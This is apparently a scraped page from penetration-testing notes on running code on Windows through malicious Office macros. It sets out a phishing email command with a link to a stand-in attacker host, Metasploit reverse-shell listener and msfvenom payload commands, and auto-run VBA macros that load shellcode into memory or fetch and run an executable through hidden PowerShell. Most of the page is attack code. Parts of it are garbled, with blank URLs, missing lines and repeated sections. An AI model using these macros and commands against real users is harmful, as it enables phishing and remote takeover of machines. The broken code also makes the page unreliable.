Client Side Code Execution

VBA Macro in MS Office

Last updated 1 year ago

Client Side Code Execution

VBA Macro in MS Office

Send email

sendemail -f admin@domain.com -t victim@domain.com -s victim.ip -u "Subject" -m "Help: http://hacker.ip/shell.hta"

Run from Web Server through

kali host web server:

python -m http.server 80

macro vba; scope = doc1

Sub MyMacro()
    Dim str As String
     ((New-Object System.Net.WebClient).DownloadString(''))"
    
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

In-Memory Shellcode VBA Macro without `.exe`

/x64/ shellcode with Dim res As LongPtr for x64 modern MS Office

Workbook_Open() for Excel

VBA Shellcode:

listener:

sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run

macro vba; scope = doc1







Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long

Function MyMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    
    

    
    
    
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    
    
End Function 

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

The shell dies when closing the doc; resolve by AutoMigrate module in MSF

VBA `.exe` Shellcode Download & Execute on Disk

shell.exe to serve in kali:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o msfstaged.exe

listener:

sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run

kali host web server:

python -m http.server 80

macro vba; scope = doc1

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('/', 'msfstaged.exe')"
    Shell str, vbHide
    Dim exePath As String
    exePath = ActiveDocument.Path + "\msfstaged.exe"
    Wait (2)
    

End Sub

Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub

IWR alternative MyMacro

Sub MyMacro()
    Dim str As String
    str = "powershell -c "IWR -Uri  -OutFile msfstaged.exe"
    Shell str, vbHide
    Dim exePath As String
    exePath = "C:\temp\msfstaged.exe"
    Wait (2)
    

End Sub

PreviousUseful NextPowershell rev.ps1

Last updated 1 year ago

Send email

sendemail -f admin@domain.com -t victim@domain.com -s victim.ip -u "Subject" -m "Help: http://hacker.ip/shell.hta"

Run from Web Server through

kali host web server:

python -m http.server 80

macro vba; scope = doc1

Sub MyMacro()
    Dim str As String
     ((New-Object System.Net.WebClient).DownloadString(''))"
    
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Powershell Inside VBA

In-Memory Shellcode VBA Macro without `.exe`

/x64/ shellcode with Dim res As LongPtr for x64 modern MS Office

Workbook_Open() for Excel

VBA Shellcode:

listener:

sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run

macro vba; scope = doc1







Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long

Function MyMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    
    

    
    
    
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    
    
End Function 

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

The shell dies when closing the doc; resolve by AutoMigrate module in MSF

Metasploit for Pentester: Migrate - Hacking ArticlesHacking Articles

VBA AV Bypass

VBA `.exe` Shellcode Download & Execute on Disk

shell.exe to serve in kali:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o msfstaged.exe

listener:

sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run

kali host web server:

python -m http.server 80

macro vba; scope = doc1

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('/', 'msfstaged.exe')"
    Shell str, vbHide
    Dim exePath As String
    exePath = ActiveDocument.Path + "\msfstaged.exe"
    Wait (2)
    

End Sub

Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub

IWR alternative MyMacro

Sub MyMacro()
    Dim str As String
    str = "powershell -c "IWR -Uri  -OutFile msfstaged.exe"
    Shell str, vbHide
    Dim exePath As String
    exePath = "C:\temp\msfstaged.exe"
    Wait (2)
    

End Sub

Send email

Run from Web Server through

In-Memory Shellcode VBA Macro without .exe

VBA .exe Shellcode Download & Execute on Disk

Send email

Run from Web Server through

In-Memory Shellcode VBA Macro without .exe

VBA .exe Shellcode Download & Execute on Disk

In-Memory Shellcode VBA Macro without `.exe`

VBA `.exe` Shellcode Download & Execute on Disk

In-Memory Shellcode VBA Macro without `.exe`

VBA `.exe` Shellcode Download & Execute on Disk